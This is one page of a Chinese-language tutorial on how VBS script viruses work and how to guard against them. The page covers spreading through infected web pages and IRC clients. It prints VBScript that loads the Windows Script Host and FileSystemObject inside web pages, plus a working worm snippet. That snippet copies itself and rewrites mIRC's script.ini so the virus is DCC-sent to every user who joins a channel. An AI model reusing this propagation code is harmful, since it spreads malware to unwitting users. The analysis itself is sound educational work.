VBS脚本病毒原理分析及防范

　　3）通过感染htm、asp、jsp、php等网页文件传播

　　如今，WWW服务已经变得非常普遍，病毒通过感染htm等文件，势必会导致所有访问过该网页的用户机器感染病毒。

　　病毒之所以能够在htm文件中发挥强大功能，采用了和绝大部分网页恶意代码相同的原理。基本上，它们采用了相同的代码，不过也可以采用其它代码，这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOT\CLSID\下我们可以找到这么一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}，注册表中对它他的说明是“Windows Script Host Shell Object”，同样，我们也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228}，注册表对它的说明是“FileSystem Object”，一般先要对COM进行初始化，在获取相应的组件对象之后，病毒便可正确地使用FSO、WSH两个对象，调用它们的强大功能。代码如下所示：

　　Set Apple0bject = document.applets("KJ_guest")
　　Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
　　Apple0bject.createInstance()　　　　　　 ’创建一个实例
　　Set WsShell Apple0bject.Get0bject()
　　Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
　　Apple0bject.createInstance()　　　　　　 ’创建一个实例
　　Set FSO = Apple0bject.Get0bject()

　　对于其他类型文件，这里不再一一分析。

　　4）通过IRC聊天通道传播

　　病毒通过IRC传播一般来说采用以下代码（以MIRC为例）

Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini")   ’创建文件script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True ’将病毒文件备份到attachment.vbs
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }"
　　　　'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件
mirc.Close

　　以上代码用来往Script.ini文件中写入一行代码，实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令，这个文件里面的命令是可以自动执行的。譬如，“歌虫”病毒TUNE.VBS就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini，使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样，如果Pirch98已安装在目标计算机的c:\pirch98目录下，病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini，使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。

　　另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中，这样，当其他用户访问这台机器时，就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。

　　还有一些其他的传播方法，我们这里不再一一列举。

　　3．VBS脚本病毒如何获得控制权

　　如何获取控制权？这一个是一个比较有趣的话题，而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法：

上一页  [1] [2] [3] [4] [5] [6] [7]  下一页